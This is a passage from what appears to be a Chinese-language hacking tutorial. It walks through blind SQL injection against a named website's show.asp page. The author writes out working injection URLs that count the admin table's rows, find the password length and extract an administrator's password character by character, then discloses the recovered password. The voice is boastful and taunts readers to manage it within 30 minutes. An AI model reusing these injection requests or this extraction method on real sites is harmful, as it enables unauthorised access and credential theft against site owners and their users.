了。
    嗯，反正我已经知道admin表是怎样的了，猜猜密码也还不算是太累的工作。先看看admin里面

有几个管理员。
http://www.janker.org/show.asp?id=3 AND 1<(select count(*) from admin)
嗯，比一个多……
http://www.janker.org/show.asp?id=3 AND 10<(select count(*) from admin)
没有十个……
（省略无聊过程若干）
http://www.janker.org/show.asp?id=3 AND 5=(select count(*) from admin)
有五个管理员呢，随便找一个破一下啊……
    我选的是id=1的，我先猜的是它的密码第一位，呵呵，密码总要一位一位的猜嘛……
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left

(password,1)="q")
嗯，显示是“未指定所需参数!”那么第一位不是q了，如果我们提交的SQL查询正确执行——也就

是我们猜对了的话，是会出来id=3的那篇文章的（前面的那些也一样）。继续来吧……
    w、e、r、t、y……猜了一会儿，结果出来了。
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left

(password,1)="j")
    显示了id为3的那篇文章，密码第一位为j。
    暂停一下，如果密码有个2、30位的话，岂不是要猜死了，先看看密码有几位再说吧。方法和

猜管理员的个数是一样的，直接给出结果
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where len(password)=7 

and id=1)
    7位，刚好在我的心理承受范围之内，8位以上的话就要考虑写程序猜了。猜测的过程是美好的

，你看到第一位是j后会怎样想呢，优先猜的肯定是a、A、4、@、k之类的吧？如果你猜到了前面三

位是jk2，后面的00也会很自信的写上去吧？最后的密码是jk2008!，呵呵，如果你在30分钟内没有

一位一位的猜出来的话，就不要做hacker/cracker了。还是给出过程：
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left

(password,2)="jk")

http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left

(password,3)="jk2")

http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left

(password,4)="jk20")

上一页  [1] [2] [3] [4] [5] 下一页